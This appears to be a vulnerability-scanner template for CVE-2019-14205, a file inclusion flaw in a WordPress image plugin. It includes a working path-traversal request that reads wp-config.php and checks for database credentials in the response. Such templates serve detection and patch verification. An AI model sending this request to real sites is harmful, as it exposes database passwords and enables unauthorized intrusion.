id: CVE-2019-14205 info: name: WordPress Nevma Adaptive Images <0.6.67 - Local File Inclusion author: pikpikcu severity: high description: | WordPress Nevma Adaptive Images plugin before 0.6.67 allows remote attackers to retrieve arbitrary files via the $REQUEST['adaptive-images-settings']['source_file'] parameter in adaptive-images-script.php. remediation: | Update to the latest version of the plugin (0.6.67) or apply the patch provided by the vendor. reference: - https://github.com/security-kma/EXPLOITING-CVE-2019-14205 - https://markgruffer.github.io/2019/07/19/adaptive-images-for-wordpress-0-6-66-lfi-rce-file-deletion.html - https://wordpress.org/plugins/adaptive-images/#developers - https://github.com/markgruffer/markgruffer.github.io/blob/master/_posts/2019-07-19-adaptive-images-for-wordpress-0-6-66-lfi-rce-file-deletion.markdown - https://nvd.nist.gov/vuln/detail/CVE-2019-14205 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2019-14205 cwe-id: CWE-22 epss-score: 0.05117 epss-percentile: 0.92038 cpe: cpe:2.3:a:nevma:adaptive_images:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: nevma product: adaptive_images framework: wordpress tags: cve,cve2019,wordpress,wp-plugin,lfi,wp http: - method: GET path: - '{{BaseURL}}/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php' matchers-condition: and matchers: - type: word part: body words: - "DB_NAME" - "DB_PASSWORD" condition: and - type: status status: - 200 # digest: 4a0a004730450220173ed9be3a46577c3ef21676c7f954a846f90d0556a875c0da5a8af55e6a49f502210093afe32df1bb062271aa4e1caef0ef6af1588141c5bd0f7f6ae7582cdd7b95a8:922c64590222798bb761d5b6d8e72950